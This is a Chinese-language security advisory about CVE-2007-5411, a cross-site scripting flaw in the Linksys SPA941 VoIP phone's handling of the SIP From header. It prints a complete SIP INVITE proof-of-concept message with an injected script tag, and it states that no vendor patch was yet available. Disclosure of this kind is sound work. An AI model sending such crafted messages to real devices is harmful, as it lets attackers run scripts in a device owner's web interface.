当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Linksys SPA941 SIP表单字段HTML注入漏洞

信息来源:Radu State (state@loria.fr)      发表日期:2013-08-15 18:03:00

 

Linksys SPA941是一款2线或4线的IP电话。

 

Linksys SPA941 VoIP电话(固件5.1.8)存在多个跨站脚本漏洞,可使远程攻击者通过SIP消息内的From报文头,利用此漏洞注入任意Web脚本或HTML。

 

BUGTRAQ-ID:25987

CVE-ID:2007-5411

受影响系统:

Linksys SPA941 VoIP Phone 5.1.8

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!INVITE sip:h@192.168.1.3 SIP/2.0

Via: SIP/2.0/UDP 192.168.1.9:5060;rport

To: sip:h@192.168.1.3

From: "<script>alert(\'hack\')</script>""natraj" <sip:natraj@loria.fr>;tag=002f000c

Call-ID: 401010907@192.168.1.9

CSeq: 4857 INVITE

Content-Type: application/sdp

Subject: sip: natraj@loria.fr

Contact: "natraj" <sip:192.168.1.9:5060;transport=udp>

Content-Length: 214

 

v=0

o=root 47650 47650 IN IP4 192.168.1.9

s=session

c=IN IP4 192.168.1.9

t=0 0

m=audio 5070 RTP/AVP 3 0 110 5

a=rtpmap:3 GSM/8000/1

a=rtpmap:0 PCMU/8000/1

a=rtpmap:110 speex/8000/1

a=rtpmap:5 DVI4/8000/1

解决办法:

厂商补丁:

 

Linksys

-------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.linksys.com